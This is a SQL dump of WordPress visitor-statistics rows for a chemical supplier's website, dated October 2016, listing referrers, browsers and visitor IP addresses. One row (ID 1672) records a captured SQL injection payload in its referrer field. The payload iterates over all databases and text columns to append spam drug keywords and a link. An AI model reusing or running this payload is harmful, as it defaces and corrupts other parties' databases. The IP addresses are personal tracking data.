INSERT INTO `wp_statistics_visitor` VALUES (1589, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1590, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '217.160.155.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1591, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1592, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1593, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.16.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1594, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '216.51.232.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1595, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '85.94.76.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1596, '2016-10-08', 'https://www.google.com.au/', 'Edge', 'Windows', '13.10586', '', '134.7.43.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1597, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.9.227.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1598, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1599, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1600, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1601, '2016-10-08', 'https://www.miller-stephenson.com/product/epon-815c/', 'MSIE', 'Windows', '9.0', '', '204.79.180.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1602, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.236.4.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1603, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '192.3.112.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1604, '2016-10-08', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.25.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1605, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1606, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-xht/xht-oils/', 'MSIE', 'Windows', '9.0', '', '204.79.180.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1607, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.38.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1608, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.60.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1609, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.102', '', '162.243.2.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1610, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.174.231.134', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1611, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '37.187.142.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1612, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1613, '2016-10-08', 'https://www.miller-stephenson.com/vertrel-fluids/', 'MSIE', 'Windows', '9.0', '', '204.79.180.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1614, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1615, '2016-10-08', 'https://www.miller-stephenson.com/product/surface-prepclean-ms-255257/', 'MSIE', 'Windows', '9.0', '', '204.79.180.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1616, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '12.0', '', '192.168.50.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1617, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1618, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1619, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1620, '2016-10-08', 'https://www.miller-stephenson.com/product/vazo-52/', 'MSIE', 'Windows', '9.0', '', '204.79.180.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1621, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '107.77.109.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1622, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1623, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1624, '2016-10-08', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1625, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '113.71.255.132', '000', 53, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1626, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '121.35.130.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1627, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1628, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1629, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1630, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1631, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1632, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1633, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1634, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.26.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1635, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '121.35.131.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1636, '2016-10-08', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.9.1', '', '199.81.244.14', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1637, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.1.9', '', '81.220.124.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1638, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1639, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1640, '2016-10-08', 'https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/', 'MSIE', 'Windows', '9.0', '', '204.79.180.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1641, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.254.66.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1642, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.123', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1643, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'MSIE', 'Windows', '9.0', '', '204.79.180.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1644, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '198.8.80.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1645, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '221.214.181.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1646, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1647, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-gpl-215/', 'MSIE', 'Windows', '9.0', '', '204.79.180.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1648, '2016-10-08', 'https://www.google.dk/', 'Chrome', 'Windows', '53.0.2785.143', '', '80.71.142.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1649, '2016-10-08', 'https://transcoder.baidu.com/from=1014994a/bd_page_type=1/ssid=0/uid=0/pu=usm%401%2Csz%40320_1003%2Cta%40iphone_2_5.1_1_11.0/baiduid=AB719046CBDBD3BF9ACB41C80CABD7FF/w=0_10_/t=iphone/l=3/tc?ref=www_iphone&lid=10585257854303671299&order=1&fm=alop&tj=www_normal_1_0_10_title&vit=osres&m=8&srd=1&cltj=cloud_title&asres=1&title=Miller-StephensonChemicalCo.%2CInc.&dict=32&w_qd=IlPT2AEptyoA_yisJUuIHj2srB0SQamnGAWOK7-X_juzpEq7hq&sec=15776&di=0bd071044a3e7ec1&bdenc=1&tch=124.0.287.213.0.0&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IEQGG_yFR0jKrj9CobvXvG2FoUTz60niNHoCb9a&eqid=92e663ef75af18001000000157f8aa8c&wd=&clk_info=%7B%22srcid%22%3A%221599%22%2C%22tplname%22%3A%22www_normal%22%2C%22t%22%3A1475914388384%2C%22xpath%22%3A%22div-div-div-a-p%22%7D', 'Android Browser', 'Android', '4.0', '', '36.45.53.88', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1650, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1651, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1652, '2016-10-08', 'https://www.google.co.in/', 'Chrome', 'Android', '44.0.2403.133', '', '106.207.225.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1653, '2016-10-08', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '106.207.225.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1654, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1655, '2016-10-08', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1656, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '38.100.21.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1657, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1658, '2016-10-08', 'https://www.miller-stephenson.com/product/teflon-white-lithium-grease/', 'MSIE', 'Windows', '9.0', '', '204.79.180.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1659, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1660, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1661, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.7', '', '158.85.11.189', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1662, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1663, '2016-10-08', 'https://www.electroyou.it/forum/viewtopic.php?f=1&t=42874&start=60', 'Firefox', 'Windows', '49.0', '', '188.135.219.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1664, '2016-10-08', 'https://www.miller-stephenson.com/product/ms-381h/', 'MSIE', 'Windows', '9.0', '', '204.79.180.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1665, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1666, '2016-10-08', 'https://www.miller-stephenson.com/product/ms-122se/', 'MSIE', 'Windows', '9.0', '', '204.79.180.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1667, '2016-10-08', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '193.254.35.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1668, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '139.201.6.43', '000', 33, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1669, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1670, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1671, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1672, '2016-10-08', 'https://google.com\\\\\\\';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in (\\\\\\\'master\\\\\\\',\\\\\\\'tempdb\\\\\\\',\\\\\\\'model\\\\\\\',\\\\\\\'msdb\\\\\\\',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s=\\\\\\\'begin try use [\\\\\\\'+@w+\\\\\\\'];declare @c cursor;declare @d varchar(4000);set @c=cursor for select \\\\\\\'\\\\\\\'update [\\\\\\\'\\\\\\\'+TABLE_NAME+\\\\\\\'\\\\\\\'] set [\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']=[\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']+case ABS(CHECKSUM(NewId()))%9 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'zyrtec ingredients \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'+case ABS(CHECKSUM(NewId()))%3 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'zyrtec dosage for adults\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' when 1 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'mattnichols.co.uk\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'zyrtec ingredients\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end +\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' zyrtec dosage for 11 year old\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end\\\\\\\'\\\\\\\' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like \\\\\\\'\\\\\\\'%varchar\\\\\\\'\\\\\\\' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch\\\\\\\';exec (@s);fetch next from @b into @w;end;close @b--', 'Firefox', 'Windows', '24.0', '', '158.85.253.245', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1673, '2016-10-08', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '127.0.0.1', '000', 49, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1674, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '534.34', '', '127.0.0.1', '000', 51, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1675, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '87.29.98.127', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1676, '2016-10-08', 'https://www.miller-stephenson.com', 'ok', 'Unknown', '2.5.0', '', '42.156.251.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1677, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1678, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-gpl-227/', 'MSIE', 'Windows', '9.0', '', '204.79.180.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1679, '2016-10-08', 'https://www.google.com.hk/', 'Chrome', 'Windows', '53.0.2785.116', '', '138.19.77.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1680, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1681, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1682, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.88.42.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1683, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1684, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-gpl-203/', 'MSIE', 'Windows', '9.0', '', '204.79.180.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1685, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.168.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1686, '2016-10-08', 'https://x-musics.com/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1687, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1688, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1689, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '68.52.64.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1690, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1691, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1692, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1693, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '51.0.2704.103', '', '64.62.210.39', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1694, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1695, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '112.16.0.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1696, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1697, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1698, '2016-10-08', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.205.45.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1699, '2016-10-08', 'https://lvov.mistr-x.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1700, '2016-10-08', 'https://www.google.ca/url?url=https://www.miller-stephenson.com/product/ms-122ad/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwj405rAg8vPAhUG1R4KHVLAA5EQFgg9MAU&usg=AFQjCNHOjw5LIzdmn9nnA3ASEiUWP1fLBQ', 'MSIE', 'Windows', '8.0', '', '10.88.140.137', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1701, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '142.19.97.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1702, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '59.36.241.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1703, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1704, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/epon-epoxy/epon-elastomer-modified-epoxy-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1705, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1706, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '74.71.147.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1707, '2016-10-08', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '192.3.244.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1708, '2016-10-08', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '192.3.244.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1709, '2016-10-08', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '192.3.244.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1710, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1711, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1712, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1', '', '124.190.155.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1713, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '114.252.235.240', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1714, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '52.39.132.73', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1715, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1716, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1717, '2016-10-08', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '74.199.36.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1718, '2016-10-08', 'https://www.miller-stephenson.com/product/vazo-67/', 'MSIE', 'Windows', '9.0', '', '204.79.180.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1719, '2016-10-08', 'https://www.miller-stephenson.com/product/epon-164/', 'MSIE', 'Windows', '9.0', '', '204.79.180.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1720, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.89.23.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1721, '2016-10-08', 'https://cn.bing.com/search?q=miller+stephenson+company&qs=n&form=QBRE&pq=miller+stephenson+company&sc=0-25&sp=-1&sk=&cvid=5DE1D62500F34BE994DC4B9087246D67', 'MSIE', 'Windows', '11.0', '', '59.172.78.238', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1722, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '51.0.2704.106', '', '209.9.128.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1723, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '51.0.2704.106', '', '209.9.128.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1724, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1725, '2016-10-08', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwjriLvZnMvPAhXIVywKHYlrDxsQFghTMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvertrel-mca%2F&usg=AFQjCNEn7XKmhJNqkvKwcWqVCR7ahXxqZA&bvm=bv.135258522,d.bGg', 'MSIE', 'Windows', '11.0', '', '138.57.212.10', '000', 3, 0); 
